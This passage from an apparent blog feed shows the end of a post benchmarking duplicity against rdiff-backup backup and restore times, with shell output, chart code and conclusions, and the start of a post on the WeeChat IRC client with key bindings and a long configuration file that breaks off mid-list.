<pre><code class="language-bash">root@data01:/# time duplicity --no-encryption /tmp/tmp.YMFLVKqr67/ ssh://172.17.0.10//var/duplicity/  
Local and Remote metadata are synchronized, no sync needed.  
Last full backup date: Wed Dec 17 02:05:04 2014  
--------------[ Backup Statistics ]--------------
StartTime 1418785633.50 (Wed Dec 17 03:07:13 2014)  
EndTime 1418785667.86 (Wed Dec 17 03:07:47 2014)  
ElapsedTime 34.36 (34.36 seconds)  
SourceFiles 64271  
SourceFileSize 677202919 (646 MB)  
NewFiles 11036  
NewFileSize 233227370 (222 MB)  
DeletedFiles 0  
ChangedFiles 0  
ChangedFileSize 0 (0 bytes)  
ChangedDeltaSize 0 (0 bytes)  
DeltaEntries 11036  
RawDeltaSize 229606454 (219 MB)  
TotalDestinationSizeChange 144816441 (138 MB)  
Errors 0  
-------------------------------------------------


real    0m35.889s  
user    0m30.717s  
sys     0m3.750s
</code></pre>

<p><strong>Result:</strong> 36 seconds</p>

<p><strong>#1 Incremental local backup::#rdiff-backup</strong></p>

<pre><code class="language-bash">root@data02:/# time rdiff-backup /tmp/tmp.5m5JUUohRz/ /var/rdiff-backup/

real    3m54.791s  
user    0m22.843s  
sys     0m6.806s
</code></pre>

<p><strong>Result:</strong> 3 minutes and 55 seconds</p>

<p><strong>#1 Incremental remote backup::#rdiff-backup</strong></p>

<pre><code class="language-bash">root@data02:/# time rdiff-backup /tmp/tmp.5m5JUUohRz/ root@storage02::/var/rdiff-backup/

real    4m14.100s  
user    0m16.245s  
sys     0m2.813s  
</code></pre>

<p><strong>Result:</strong> 4 minutes and 14 seconds</p>

<p>Another backup, now some data was removed:</p>

<p><code>root@data01:/tmp/tmp.YMFLVKqr67# rm -rf ./addons</code></p>

<p>Local data has: <strong>42653 files</strong>, <strong>20030 directories</strong> and <strong>731MB</strong>    of space</p>

<p><strong>#2 Incremental local backup::#duplicity</strong></p>

<pre><code class="language-bash">root@data01:/# time duplicity --no-encryption /tmp/tmp.YMFLVKqr67/ file:///var/duplicity/  
Local and Remote metadata are synchronized, no sync needed.  
Last full backup date: Tue Dec 16 21:32:46 2014  
--------------[ Backup Statistics ]--------------
StartTime 1418837027.28 (Wed Dec 17 17:23:47 2014)  
EndTime 1418837041.33 (Wed Dec 17 17:24:01 2014)  
ElapsedTime 14.06 (14.06 seconds)  
SourceFiles 62686  
SourceFileSize 652525867 (622 MB)  
NewFiles 2  
NewFileSize 8192 (8.00 KB)  
DeletedFiles 1585  
ChangedFiles 1  
ChangedFileSize 649680 (634 KB)  
ChangedDeltaSize 0 (0 bytes)  
DeltaEntries 1588  
RawDeltaSize 649808 (635 KB)  
TotalDestinationSizeChange 241702 (236 KB)  
Errors 0  
-------------------------------------------------


real    0m14.372s  
user    0m11.946s  
sys     0m2.208s
</code></pre>

<p><strong>Result:</strong> 14 seconds</p>

<p><strong>#2 Incremental remote backup::#duplicity</strong></p>

<pre><code class="language-bash">root@data01:/# time duplicity --no-encryption /tmp/tmp.YMFLVKqr67/ ssh://storage01//var/duplicity/  
Synchronizing remote metadata to local cache...  
Copying duplicity-inc.20141217T020504Z.to.20141217T030713Z.manifest to local cache.  
Copying duplicity-new-signatures.20141217T020504Z.to.20141217T030713Z.sigtar.gz to local cache.  
Last full backup date: Wed Dec 17 02:05:04 2014  
--------------[ Backup Statistics ]--------------
StartTime 1418837112.75 (Wed Dec 17 17:25:12 2014)  
EndTime 1418837127.06 (Wed Dec 17 17:25:27 2014)  
ElapsedTime 14.31 (14.31 seconds)  
SourceFiles 62686  
SourceFileSize 652525867 (622 MB)  
NewFiles 2  
NewFileSize 8192 (8.00 KB)  
DeletedFiles 1585  
ChangedFiles 1  
ChangedFileSize 649680 (634 KB)  
ChangedDeltaSize 0 (0 bytes)  
DeltaEntries 1588  
RawDeltaSize 649808 (635 KB)  
TotalDestinationSizeChange 241702 (236 KB)  
Errors 0  
-------------------------------------------------


real    0m15.151s  
user    0m12.485s  
sys     0m2.359s  
</code></pre>

<p><strong>Result:</strong> 15 seconds</p>

<p><strong>#2 Incremental local backup::#rdiff-backup</strong></p>

<pre><code class="language-bash">root@data02:/# time rdiff-backup /tmp/tmp.5m5JUUohRz/ /var/rdiff-backup/

real    0m57.376s  
user    0m15.506s  
sys     0m2.582s
</code></pre>

<p><strong>Result:</strong> 57 seconds  </p>

<p><strong>#2 Incremental remote backup::#rdiff-backup</strong></p>

<pre><code class="language-bash">root@data02:/# time rdiff-backup /tmp/tmp.5m5JUUohRz/ root@storage02::/var/rdiff-backup/

real    0m54.370s  
user    0m3.627s  
sys     0m2.042s  
</code></pre>

<p><strong>Result:</strong> 54 seconds</p>

<p>And the last incremental backup, now - adding two .iso files (23MB each). <br />
As result: <strong>42655 files</strong>, <strong>20030 directories</strong> and <strong>777MB</strong> of space.</p>

<p><strong>#3 Incremental local backup::#duplicity</strong></p>

<pre><code class="language-bash">root@data01:/# time duplicity --no-encryption /tmp/tmp.YMFLVKqr67/ file:///var/duplicity/  
Local and Remote metadata are synchronized, no sync needed.  
Last full backup date: Tue Dec 16 21:32:46 2014  
--------------[ Backup Statistics ]--------------
StartTime 1418839612.96 (Wed Dec 17 18:06:52 2014)  
EndTime 1418839628.26 (Wed Dec 17 18:07:08 2014)  
ElapsedTime 15.31 (15.31 seconds)  
SourceFiles 62687  
SourceFileSize 700756267 (668 MB)  
NewFiles 4  
NewFileSize 48242688 (46.0 MB)  
DeletedFiles 1  
ChangedFiles 0  
ChangedFileSize 0 (0 bytes)  
ChangedDeltaSize 0 (0 bytes)  
DeltaEntries 5  
RawDeltaSize 48234496 (46.0 MB)  
TotalDestinationSizeChange 29748287 (28.4 MB)  
Errors 0  
-------------------------------------------------


real    0m15.509s  
user    0m13.164s  
sys     0m2.239s  
</code></pre>

<p><br />
<strong>Result:</strong> 16 seconds</p>

<p><strong>#3 Incremental remote backup::#duplicity</strong></p>

<pre><code class="language-bash">root@data01:/# time duplicity --no-encryption /tmp/tmp.YMFLVKqr67/ ssh://storage01//var/duplicity/  
Local and Remote metadata are synchronized, no sync needed.  
Last full backup date: Wed Dec 17 02:05:04 2014  
--------------[ Backup Statistics ]--------------
StartTime 1418839573.08 (Wed Dec 17 18:06:13 2014)  
EndTime 1418839595.15 (Wed Dec 17 18:06:35 2014)  
ElapsedTime 22.07 (22.07 seconds)  
SourceFiles 62687  
SourceFileSize 700756267 (668 MB)  
NewFiles 4  
NewFileSize 48242688 (46.0 MB)  
DeletedFiles 1  
ChangedFiles 0  
ChangedFileSize 0 (0 bytes)  
ChangedDeltaSize 0 (0 bytes)  
DeltaEntries 5  
RawDeltaSize 48234496 (46.0 MB)  
TotalDestinationSizeChange 29748287 (28.4 MB)  
Errors 0  
-------------------------------------------------


real    0m22.801s  
user    0m19.203s  
sys     0m3.067s  
</code></pre>

<p><strong>Result:</strong> 23 seconds</p>

<p><strong>#3 Incremental local backup::#rdiff-backup</strong></p>

<pre><code class="language-bash">root@data02:/# time rdiff-backup /tmp/tmp.5m5JUUohRz/ /var/rdiff-backup/

real    0m16.580s  
user    0m13.669s  
sys     0m1.922s  
</code></pre>

<p><strong>Result:</strong> 16 seconds</p>

<p><strong>#3 Incremental remote backup::#rdiff-backup</strong></p>

<pre><code class="language-bash">root@data02:/# time rdiff-backup /tmp/tmp.5m5JUUohRz/ root@storage02::/var/rdiff-backup/

real    0m21.882s  
user    0m5.306s  
sys     0m1.998s  
</code></pre>

<p><strong>Result:</strong> 22 seconds</p>

<h2 id="restoring">Restoring</h2>

<p>Time to recover our data. <br />
Oops: <code>root@data02:/tmp/tmp.5m5JUUohRz# rm -rf ./*</code> (I'll do this after each recover)</p>

<p><strong>Full restore from local backup::#rdiff-backup</strong></p>

<pre><code class="language-bash">root@data02:/# time rdiff-backup --restore-as-of now /var/rdiff-backup/ /tmp/tmp.5m5JUUohRz/

real    0m57.613s  
user    0m14.083s  
sys     0m14.696s  
</code></pre>

<p><strong>Result:</strong> 58 seconds</p>

<p><strong>Full restore from remote backup::#rdiff-backup</strong></p>

<pre><code class="language-bash">root@data02:/# time rdiff-backup --restore-as-of now root@storage02::/var/rdiff-backup/ /tmp/tmp.5m5JUUohRz/

real    1m34.002s  
user    0m11.524s  
sys     0m6.837s  
</code></pre>

<p><strong>Result:</strong> 1 minute and 34 seconds</p>

<p><strong>Full restore from local backup::#duplicity</strong></p>

<pre><code class="language-bash">root@data01:/tmp/tmp.YMFLVKqr67# time duplicity --no-encryption file:///var/duplicity/ /tmp/tmp.YMFLVKqr67/  
Local and Remote metadata are synchronized, no sync needed.  
Last full backup date: Tue Dec 16 21:32:46 2014

real    0m35.601s  
user    0m21.941s  
sys     0m8.692s  
</code></pre>

<p><strong>Result:</strong> 36 seconds</p>

<p><strong>Full restore from remote backup::#duplicity</strong></p>

<pre><code class="language-bash">root@data01:/# time duplicity --no-encryption ssh://storage01//var/duplicity/ /tmp/tmp.YMFLVKqr67/  
Local and Remote metadata are synchronized, no sync needed.  
Last full backup date: Wed Dec 17 02:05:04 2014

real    0m45.229s  
user    0m35.745s  
sys     0m9.431s  
</code></pre>

<p><strong>Result:</strong> 45 seconds</p>

<h2 id="restoringtospecifictime">Restoring to specific time:</h2>

<p><strong>Restore from specific local backup::#rdiff-backup</strong></p>

<pre><code class="language-bash">root@data02:/# time rdiff-backup --restore-as-of 2014-12-17T17:34:04Z /var/rdiff-backup/ /tmp/tmp.5m5JUUohRz/

real    0m31.792s  
user    0m15.487s  
sys     0m11.008s  
</code></pre>

<p><strong>Result:</strong> 32 seconds</p>

<p><strong>Restore from specific remote backup::#rdiff-backup</strong></p>

<pre><code class="language-bash">root@data02:/# time rdiff-backup --restore-as-of 2014-12-17T17:38:01Z storage02::/var/rdiff-backup/ /tmp/tmp.5m5JUUohRz/

real    1m30.043s  
user    0m11.345s  
sys     0m6.923s  
</code></pre>

<p><strong>Result:</strong> 1 minute and 30 seconds</p>

<p><strong>Restore from specific local backup::#duplicity</strong></p>

<pre><code class="language-bash">root@data01:/# time duplicity --no-encryption -t 2014-12-17T17:23:47Z file:///var/duplicity/ /tmp/tmp.YMFLVKqr67/  
Local and Remote metadata are synchronized, no sync needed.  
Last full backup date: Tue Dec 16 21:32:46 2014

real    0m25.768s  
user    0m17.950s  
sys     0m6.917s  
</code></pre>

<p><strong>Result:</strong> 26 seconds</p>

<p><strong>Restore from specific remote backup::#duplicity</strong></p>

<pre><code class="language-bash">root@data01:/# time duplicity --no-encryption -t 2014-12-17T17:25:12Z ssh://storage01//var/duplicity/ /tmp/tmp.YMFLVKqr67/  
Local and Remote metadata are synchronized, no sync needed.  
Last full backup date: Wed Dec 17 02:05:04 2014

real    0m46.186s  
user    0m38.004s  
sys     0m10.209s  
</code></pre>

<p><strong>Result:</strong> 46 seconds</p>

<h2 id="resultsandconclusion">Results and conclusion</h2>

<p>I think this is enough. I've been made many tests, starting from <strong>33599 files</strong>, <strong>19637 directories</strong> and 512MB of space to <strong>42653 files</strong>, <strong>20030 directories</strong> and 731MB of space.   </p>

<p>This chart shows how long <strong style="color:#d7a502">Rdiff-backup</strong> and  <strong style="color:#f05b4f">Duplicity</strong> backup process was (lower is better)   </p>

<div class='ct-chart'><div class='ct-chart-bar'></div></div>

<p>As you see, <strong>rdiff-backup is extremely slow in incremental back-up with many files</strong> and in restoring data. But a little bit faster in initial local backup.   </p>

<p>But rdiff-backup has another disadvantage - <strong>occupied space</strong> <br />
All duplicity backup data takes about <strong>387MB</strong>, when the same backup in rdiff-backup - <strong>880MB</strong>. <br />
<strong>So rdiff-backup occupies 127% more space than duplicity.</strong> <br />
The reason for this - duplicity store all data in compressed files called volumes. This can save a lot of space on disk. <br />
But this <strong>gup is narrowing</strong> when you remove some data from local storage, in this case <strong>rdiff-backup</strong> will compress the difference and move this files into <strong>compressed snapshot</strong>. <br />
While all data in duplicity backup are compressed already, and may be difficult access duplicity backup as usual files (which is easy in rdiff-backup), but I think is is a rare exception :)  </p>

<h3 id="comparisonofusedspacestrongstylecolord7a502rdiffbackupstrongandstrongstylecolorf05b4fduplicitystrongmb">Comparison of used space (<strong style="color:#d7a502">Rdiff-backup</strong> and  <strong style="color:#f05b4f">Duplicity</strong>, MB)</h3>

<div class='ct-chart'><div class="chart_wrapper"><div class='ct-chart-round'></div><div class='ct-chart-round_2'></div><div class='ct-chart-round_3'></div><div class='ct-chart-round_4'></div></div></div>

<div id='ct-chart_labels_r'><p>Initial backup</p><p>#1 Increment</p><p>#2 Increment</p><p>#3 Increment</p></div>

<p><strong>That's all folks.</strong></p>

<p>Links: <br />
<a href='http://duplicity.nongnu.org/' >Duplicity</a> <br />
<a href='http://www.nongnu.org/rdiff-backup/' >Rdiff-backup</a> <br />
<a href='http://gionkunz.github.io/chartist-js/' >Chartist-js</a>  </p>

<style>  
div[class^="ct-chart-round"] {  
    display: inline;
    float: left;
    height: 200px;
    margin-bottom: 0;
    margin-left: 25px;
    margin-top: 50px;
    width: 200px;
}
.ct-chart-bar {
    height: 550px;
    width: auto;
}
div#ct-chart_labels_r {  
    display: block;
    float: left;
    height: auto;
    width: 100%;
}
#ct-chart_labels_r > p {
    display: block;
    float: left;
    height: 100px;
    margin-left: 25px;
    text-align: center;
    width: 200px;
}
.chart_wrapper {
    display: block;
    float: left;
    height: auto;
    width: 100%;
}
.ct-label.ct-horizontal {
    line-height: 14px;
    width: 90% !important;
}
</style>  

<script>  
new Chartist.Bar('.ct-chart-bar', {  
  labels: ['Initial local', 'Initial remote', '#1 Incremental local', '#1 Incremental remote', '#2 Incremental local', '#2 Incremental remote', '#3 Incremental local', '#3 Incremental remote','Local restore to last state','Remote restore to last state','Local restore to specific state','Remote restore to specific state'],
  series: [
    [32, 57, 233, 254,57,54,16.5,22,57.6,74,31,90],
    [36, 50, 27, 35,15,14,15.5,23,35,45.2,25,46],
  ]
}, {
  seriesBarDistance: 20,
  axisX: {
    offset: 60
  },
  axisY: {
    offset: 80,
    labelInterpolationFnc: function(value) {
      return value + ' sec'
    },
    scaleMinSpace: 15
  }
});
new Chartist.Pie('.ct-chart-round', {  
  series: [592,217]
}, {
  donut: true,
  donutWidth: 50,
  startAngle: 360,
  total: 809,
  showLabel: true
});
new Chartist.Pie('.ct-chart-round_2', {  
  series: [843,360]
}, {
  donut: true,
  donutWidth: 50,
  startAngle: 360,
  total: 1203,
  showLabel: true
});
new Chartist.Pie('.ct-chart-round_3', {  
  series: [833,360]
}, {
  donut: true,
  donutWidth: 50,
  startAngle: 360,
  total: 1193,
  showLabel: true
});
new Chartist.Pie('.ct-chart-round_4', {  
  series: [884,410]
}, {
  donut: true,
  donutWidth: 50,
  startAngle: 360,
  total: 1294,
  showLabel: true
});
</script>]]></description><link>http://blog.roundside.com/duplicity-vs-rdiff-backup-in-action/</link><guid isPermaLink="false">dbc60cd3-3b6e-4a3c-ac0a-77364097b577</guid><category><![CDATA[linux]]></category><category><![CDATA[backup]]></category><category><![CDATA[duplicity]]></category><category><![CDATA[rdiff-backup]]></category><dc:creator><![CDATA[Vadim]]></dc:creator><pubDate>Sun, 07 Dec 2014 03:40:10 GMT</pubDate></item><item><title><![CDATA[Weechat, ncurses-based irc client]]></title><description><![CDATA[<p><a href='http://weechat.org/' >Weechat</a>, together with irssi is nice irc clients. But wheechat has some 'hidden' power, it can use scripts (in ruby, perl, python, lua and something else) that can increase functionality and usability.</p>

<p><img class='middlecenter' src='http://files.roundside.com/content/weechat.png' ></p>

<p>Keys:</p>

<ul>
<li>F11:F12  - scroll user list up/down</li>
<li>F9:F10 - scroll top bar left/right</li>
<li>/CL - clear screen</li>
<li>/save - save modifications to config files</li>
</ul>

<p>Connection to freenode (just for example) is pretty easy:</p>

<pre><code class="language-bash">/connect irc.freenode.net
/msg NickServIdentify password
</code></pre>

<p>to register:</p>

<pre><code class="language-bash">msg nickserv register  
</code></pre>

<p>Below is my simple weechat config (~/.weechat/weechat.conf):</p>

<pre><code class="language-bash">#
# weechat.conf -- weechat v0.4.3
#

[debug]

[startup]
command_after_plugins = ""  
command_before_plugins = ""  
display_logo = on  
display_version = on  
sys_rlimit = ""

[look]
align_end_of_lines = message  
bar_more_down = "▼"  
bar_more_left = "◀"  
bar_more_right = "▶"  
bar_more_up = "▲"  
buffer_auto_renumber = on  
buffer_notify_default = all  
buffer_position = end  
buffer_search_case_sensitive = off  
buffer_search_force_default = off  
buffer_search_regex = off  
buffer_search_where = message  
buffer_time_format = "%H:%M:%S"  
color_basic_force_bold = off  
color_inactive_buffer = on  
color_inactive_message = on  
color_inactive_prefix = on  
color_inactive_prefix_buffer = on  
color_inactive_time = off  
color_inactive_window = on  
color_nick_offline = on  
color_pairs_auto_reset = 5  
color_real_white = off  
command_chars = ""  
confirm_quit = off  
day_change = on  
day_change_message_1date = "▬▬▶ %a, %d %b %Y ◀▬▬"  
day_change_message_2dates = "▬▬▶ %%a, %%d %%b %%Y (%a, %d %b %Y) ◀▬▬"  
eat_newline_glitch = off  
emphasized_attributes = ""  
highlight = ""  
highlight_regex = ""  
highlight_tags = ""  
hotlist_add_buffer_if_away = on  
hotlist_buffer_separator = ", "  
hotlist_count_max = 2  
hotlist_count_min_msg = 2  
hotlist_names_count = 3  
hotlist_names_length = 0  
hotlist_names_level = 12  
hotlist_names_merged_buffers = off  
hotlist_prefix = "H: "  
hotlist_short_names = on  
hotlist_sort = group_time_asc  
hotlist_suffix = ""  
hotlist_unique_numbers = on  
input_cursor_scroll = 20  
input_share = none  
input_share_overwrite = off  
input_undo_max = 32  
item_buffer_filter = "•"  
item_buffer_zoom = "!"  
item_time_format = "%H:%M"  
jump_current_to_previous_buffer = on  
jump_previous_buffer_when_closing = on  
jump_smart_back_to_buffer = on  
key_bind_safe = on  
mouse = off  
mouse_timer_delay = 100  
nick_prefix = ""  
nick_suffix = ""  
paste_bracketed = on  
paste_bracketed_timer_delay = 10  
paste_max_lines = 1  
prefix_action = " *"  
prefix_align = right  
prefix_align_max = 0  
prefix_align_min = 0  
prefix_align_more = "+"  
prefix_align_more_after = on  
prefix_buffer_align = right  
prefix_buffer_align_max = 0  
prefix_buffer_align_more = "+"  
prefix_buffer_align_more_after = on  
prefix_error = "=!="  
prefix_join = "▬▬▶"  
prefix_network = "--"  
prefix_quit = "◀▬▬"  
prefix_same_nick = ""  
prefix_suffix = "|"  
read_marker = line  
read_marker_always_show = off  
read_marker_string = "─"  
save_config_on_exit = on  
save_layout_on_exit = none  
scroll_amount = 3  
scroll_bottom_after_switch = off  
scroll_page_percent = 100  
search_text_not_found_alert = on  
separator_horizontal = "="  
separator_vertical = ""  
tab_width = 1  
time_format = "%a, %d %b %Y %T"  
window_auto_zoom = off  
window_separator_horizontal = on  
window_separator_vertical = on  
window_title = "WeeChat ${info:version}"

[palette]

[color]
bar_more = blue  
chat = default  
chat_bg = default  
chat_buffer = white  
chat_channel = white  
chat_day_change = cyan  
chat_delimiters = default  
chat_highlight = black  
chat_highlight_bg = brown  
chat_host = cyan  
chat_inactive_buffer = default  
chat_inactive_window = default  
chat_nick = default  
chat_nick_colors = "brown,cyan,lightred,lightgreen,yellow,lightblue,lightmagenta,lightcyan"  
chat_nick_offline = default  
chat_nick_offline_highlight = default  
chat_nick_offline_highlight_bg = default  
chat_nick_other = cyan  
chat_nick_prefix = green  
chat_nick_self = cyan  
chat_nick_suffix = green  
chat_prefix_action = white  
chat_prefix_buffer = brown  
chat_prefix_buffer_inactive_buffer = default  
chat_prefix_error = yellow  
chat_prefix_join = darkgray  
chat_prefix_more = default  
chat_prefix_network = default  
chat_prefix_quit = darkgray  
chat_prefix_suffix = default  
chat_read_marker = 31  
chat_read_marker_bg = default  
chat_server = brown  
chat_tags = red  
chat_text_found = yellow  
chat_text_found_bg = lightmagenta  
chat_time = darkgray  
chat_time_delimiters = darkgray  
chat_value = cyan  
emphasized = yellow  
emphasized_bg = magenta  
input_actions = lightgreen  
input_text_not_found = red  
nicklist_away = default  
nicklist_group = green  
nicklist_offline = default  
separator = 6  
status_count_highlight = magenta  
status_count_msg = brown  
status_count_other = default  
status_count_private = green  
status_data_highlight = 163  
status_data_msg = yellow  
status_data_other = default  
status_data_private = lightgreen  
status_filter = green  
status_more = yellow  
status_name = white  
status_name_ssl = lightgreen  
status_number = yellow  
status_time = default

[completion]
base_word_until_cursor = on  
default_template = "%(nicks)|%(irc_channels)"  
nick_add_space = on  
nick_completer = ":"  
nick_first_only = off  
nick_ignore_chars = "[]`_-^"  
partial_completion_alert = on  
partial_completion_command = off  
partial_completion_command_arg = off  
partial_completion_count = on  
partial_completion_other = off

[history]
display_default = 5  
max_buffer_lines_minutes = 0  
max_buffer_lines_number = 4096  
max_commands = 100  
max_visited_buffers = 50

[proxy]

[network]
connection_timeout = 60  
gnutls_ca_file = "/etc/ssl/certs/ca-certificates.crt"  
gnutls_handshake_timeout = 30  
proxy_curl = ""

[plugin]
autoload = "*"  
debug = off  
extension = ".so,.dll"  
path = "%h/plugins"  
save_config_on_unload = on

[bar]
input.color_bg = default  
input.color_delim = cyan  
input.color_fg = default  
input.conditions = ""  
input.filling_left_right = vertical  
input.filling_top_bottom = horizontal  
input.hidden = off  
input.items = "[input_prompt]+(away),[input_search],[input_paste],input_text"  
input.position = bottom  
input.priority = 1000  
input.separator = off  
input.size = 1  
input.size_max = 0  
input.type = window  
nicklist.color_bg = default  
nicklist.color_delim = cyan  
nicklist.color_fg = default  
nicklist.conditions = "${nicklist}"  
nicklist.filling_left_right = vertical  
nicklist.filling_top_bottom = columns_vertical  
nicklist.hidden = off  
nicklist.items = "buffer_nicklist"  
nicklist.position = right  
nicklist.priority = 200  
nicklist.separator = on  
nicklist.size = 0  
nicklist.size_max = 0  
nicklist.type = window  
status.color_bg = 60  
status.color_delim = cyan  
status.color_fg = default  
status.conditions = ""  
status.filling_left_right = vertical  
status.filling_top_bottom = horizontal  
status.hidden = off  
status.items = "[time],[buffer_count],[buffer_plugin],buffer_number+:+buffer_name+(buffer_modes)+{buffer_nicklist_count}+buffer_zoom+buffer_filter,[lag],[hotlist],completion,scroll"  
status.position = bottom  
status.priority = 500  
status.separator = off  
status.size = 1  
status.size_max = 0  
status.type = window  
title.color_bg = darkgray  
title.color_delim = cyan  
title.color_fg = default  
title.conditions = ""  
title.filling_left_right = vertical  
title.filling_top_bottom = horizontal  
title.hidden = off  
title.items = "buffer_title"  
title.position = top  
title.priority = 500  
title.separator = off  
title.size = 1  
title.size_max = 0  
title.type = window

[layout]

[notify]

[filter]

[key]
ctrl-? = "/input delete_previous_char"  
ctrl-A = "/input move_beginning_of_line"  
ctrl-B = "/input move_previous_char"  
ctrl-C_ = "/input insert \x1F"  
ctrl-Cb = "/input insert \x02"  
ctrl-Cc = "/input insert \x03"  
ctrl-Ci = "/input insert \x1D"  
ctrl-Co = "/input insert \x0F"  
ctrl-Cv = "/input insert \x16"  
ctrl-D = "/input delete_next_char"  
ctrl-E = "/input move_end_of_line"  
ctrl-F = "/input move_next_char"  
ctrl-H = "/input delete_previous_char"  
ctrl-I = "/input complete_next"  
ctrl-J = "/input return"  
ctrl-K = "/input delete_end_of_line"  
ctrl-L = "/window refresh"  
ctrl-M = "/input return"  
ctrl-N = "/buffer +1"  
ctrl-P = "/buffer -1"  
ctrl-R = "/input search_text"  
ctrl-Sctrl-U = "/input set_unread"  
ctrl-T = "/input transpose_chars"  
ctrl-U = "/input delete_beginning_of_line"  
ctrl-W = "/input delete_previous_word"  
ctrl-X = "/input switch_active_buffer"  
ctrl-Y = "/input clipboard_paste"  
meta-meta2-1~ = "/window scroll_top"  
meta-meta2-23~ = "/bar scroll nicklist * b"  
meta-meta2-24~ = "/bar scroll nicklist * e"  
meta-meta2-4~ = "/window scroll_bottom"  
meta-meta2-5~ = "/window scroll_up"  
meta-meta2-6~ = "/window scroll_down"  
meta-meta2-7~ = "/window scroll_top"  
meta-meta2-8~ = "/window scroll_bottom"  
meta-meta2-A = "/buffer -1"  
meta-meta2-B = "/buffer +1"  
meta-meta2-C = "/buffer +1"  
meta-meta2-D = "/buffer -1"  
meta-/ = "/input jump_last_buffer_displayed"  
meta-0 = "/buffer *10"  
meta-1 = "/buffer *1"  
meta-2 = "/buffer *2"  
meta-3 = "/buffer *3"  
meta-4 = "/buffer *4"  
meta-5 = "/buffer *5"  
meta-6 = "/buffer *6"  
meta-7 = "/buffer *7"  
meta-8 = "/buffer *8"  
meta-9 = "/buffer *9"  
meta-&lt; = "/input jump_previously_visited_buffer"  
meta-= = "/filter toggle"  
meta-&gt; = "/input jump_next_visited_buffer"  
meta-OA = "/input history_global_previous"  
meta-OB = "/input history_global_next"  
meta-OC = "/input move_next_word"  
meta-OD = "/input move_previous_word"  
meta-OF = "/input move_end_of_line"  
meta-OH = "/input move_beginning_of_line"  
meta-Oa = "/input history_global_previous"  
meta-Ob = "/input history_global_next"  
meta-Oc = "/input move_next_word"  
meta-Od = "/input move_previous_word"  
meta2-15~ = "/buffer -1"  
meta2-17~ = "/buffer +1"  
meta2-18~ = "/window -1"  
meta2-19~ = "/window +1"  
meta2-1;3A = "/buffer -1"  
meta2-1;3B = "/buffer +1"  
meta2-1;3C = "/buffer +1"  
meta2-1;3D = "/buffer -1"  
meta2-1;3F = "/window scroll_bottom"  
meta2-1;3H = "/window scroll_top"  
meta2-1;5A = "/input history_global_previous"  
meta2-1;5B = "/input history_global_next"  
meta2-1;5C = "/input move_next_word"  
meta2-1;5D = "/input move_previous_word"  
meta2-1~ = "/input move_beginning_of_line"  
meta2-200~ = "/input paste_start"  
meta2-201~ = "/input paste_stop"  
meta2-20~ = "/bar scroll title * -30%"  
meta2-21~ = "/bar scroll title * +30%"  
meta2-23;3~ = "/bar scroll nicklist * b"  
meta2-23~ = "/bar scroll nicklist * -100%"  
meta2-24;3~ = "/bar scroll nicklist * e"  
meta2-24~ = "/bar scroll nicklist * +100%"  
meta2-3~ = "/input delete_next_char"  
meta2-4~ = "/input move_end_of_line"  
meta2-5;3~ = "/window scroll_up"  
meta2-5~ = "/window page_up"  
meta2-6;3~ = "/window scroll_down"  
meta2-6~ = "/window page_down"  
meta2-7~ = "/input move_beginning_of_line"  
meta2-8~ = "/input move_end_of_line"  
meta2-A = "/input history_previous"  
meta2-B = "/input history_next"  
meta2-C = "/input move_next_char"  
meta2-D = "/input move_previous_char"  
meta2-F = "/input move_end_of_line"  
meta2-G = "/window page_down"  
meta2-H = "/input move_beginning_of_line"  
meta2-I = "/window page_up"  
meta2-Z = "/input complete_previous"  
meta2-[E = "/buffer -1"  
meta-_ = "/input redo"  
meta-a = "/input jump_smart"  
meta-b = "/input move_previous_word"  
meta-d = "/input delete_next_word"  
meta-f = "/input move_next_word"  
meta-h = "/input hotlist_clear"  
meta-jmeta-l = "/input jump_last_buffer"  
meta-jmeta-r = "/server raw"  
meta-jmeta-s = "/server jump"  
meta-j01 = "/buffer 1"  
meta-j02 = "/buffer 2"  
meta-j03 = "/buffer 3"  
meta-j04 = "/buffer 4"  
meta-j05 = "/buffer 5"  
meta-j06 = "/buffer 6"  
meta-j07 = "/buffer 7"  
meta-j08 = "/buffer 8"  
meta-j09 = "/buffer 9"  
meta-j10 = "/buffer 10"  
meta-j11 = "/buffer 11"  
meta-j12 = "/buffer 12"  
meta-j13 = "/buffer 13"  
meta-j14 = "/buffer 14"  
meta-j15 = "/buffer 15"  
meta-j16 = "/buffer 16"  
meta-j17 = "/buffer 17"  
meta-j18 = "/buffer 18"  
meta-j19 = "/buffer 19"  
meta-j20 = "/buffer 20"  
meta-j21 = "/buffer 21"  
meta-j22 = "/buffer 22"  
meta-j23 = "/buffer 23"  
meta-j24 = "/buffer 24"  
meta-j25 = "/buffer 25"  
meta-j26 = "/buffer 26"  
meta-j27 = "/buffer 27"  
meta-j28 = "/buffer 28"  
meta-j29 = "/buffer 29"  
meta-j30 = "/buffer 30"  
meta-j31 = "/buffer 31"  
meta-j32 = "/buffer 32"  
meta-j33 = "/buffer 33"  
meta-j34 = "/buffer 34"  
meta-j35 = "/buffer 35"  
meta-j36 = "/buffer 36"  
meta-j37 = "/buffer 37"  
meta-j38 = "/buffer 38"  
meta-j39 = "/buffer 39"  
meta-j40 = "/buffer 40"  
meta-j41 = "/buffer 41"  
meta-j42 = "/buffer 42"  
meta-j43 = "/buffer 43"  
meta-j44 = "/buffer 44"  
meta-j45 = "/buffer 45"  
meta-j46 = "/buffer 46"  
meta-j47 = "/buffer 47"  
meta-j48 = "/buffer 48"  
meta-j49 = "/buffer 49"  
meta-j50 = "/buffer 50"  
meta-j51 = "/buffer 51"  
meta-j52 = "/buffer 52"  
meta-j53 = "/buffer 53"  
meta-j54 = "/buffer 54"  
meta-j55 = "/buffer 55"  
meta-j56 = "/buffer 56"  
meta-j57 = "/buffer 57"  
meta-j58 = "/buffer 58"  
meta-j59 = "/buffer 59"  
meta-j60 = "/buffer 60"  
meta-j61 = "/buffer 61"  
meta-j62 = "/buffer 62"  
meta-j63 = "/buffer 63"  
meta-j64 = "/buffer 64"  
meta-j65 = "/buffer 65"  
meta-j66 = "/buffer 66"  
meta-j67 = "/buffer 67"  
meta-j68 = "/buffer 68"  
meta-j69 = "/buffer 69"  
meta-j70 = "/buffer 70"  
meta-j71 = "/buffer 71"  
meta-j72 = "/buffer 72"  
meta-j73 = "/buffer 73"  
meta-j74 = "/buffer 74"  
meta-j75 = "/buffer 75"  
meta-j76 = "/buffer 76"  
meta-j77 = "/buffer 77"  
meta-j78 = "/buffer 78"  
meta-j79 = "/buffer 79"  
meta-j80 = "/buffer 80"  
meta-j81 = "/buffer 81"  
meta-j82 = "/buffer 82"  
meta-j83 = "/buffer 83"  
meta-j84 = "/buffer 84"  
meta-j85 = "/buffer 85"  
meta-j86 = "/buffer 86"  
meta-j87 = "/buffer 87"  
meta-j88 = "/buffer 88"  
